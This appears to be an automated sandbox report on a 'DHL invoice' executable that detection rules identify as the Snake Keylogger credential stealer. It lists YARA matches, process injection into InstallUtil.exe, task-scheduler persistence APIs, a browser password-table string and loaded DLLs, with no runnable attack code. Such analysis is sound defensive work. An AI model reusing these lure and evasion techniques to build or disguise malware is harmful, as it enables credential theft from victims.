Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05DC67B0	4_2_05DC67B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05DC67A0	4_2_05DC67A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05DCB7A0	4_2_05DCB7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05DC7F58	4_2_05DC7F58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05DC4358	4_2_05DC4358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05DC4368	4_2_05DC4368
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05DCAB03	4_2_05DCAB03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05DC9E67	4_2_05DC9E67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05DC6210	4_2_05DC6210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05DC3600	4_2_05DC3600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05DC6220	4_2_05DC6220

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe	Binary or memory string: OriginalFilename vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050412562.0000000005D80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDspdsurwj.dll" vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.000000000253F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2035150985.00000000005DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.00000000023B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000000.1681633639.0000000000084000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMizMhanageSetup.exej% vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Invoice DHL - AWB 2024 E4001 - 0000731.exe
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe	Binary or memory string: OriginalFilenameMizMhanageSetup.exej% vs Invoice DHL - AWB 2024 E4001 - 0000731.exe

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Invoice DHL - AWB 2024 E4001 - 0000731.exe PID: 6672, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 1432, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, Gbiuhzoprp.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, -t-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, -t-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.33cf790.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5290000.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@3/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe, 00000004.00000002.2940130567.0000000002646000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002655000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2940130567.0000000002637000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe	Virustotal: Detection: 26%
Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe	ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe "C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe"
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
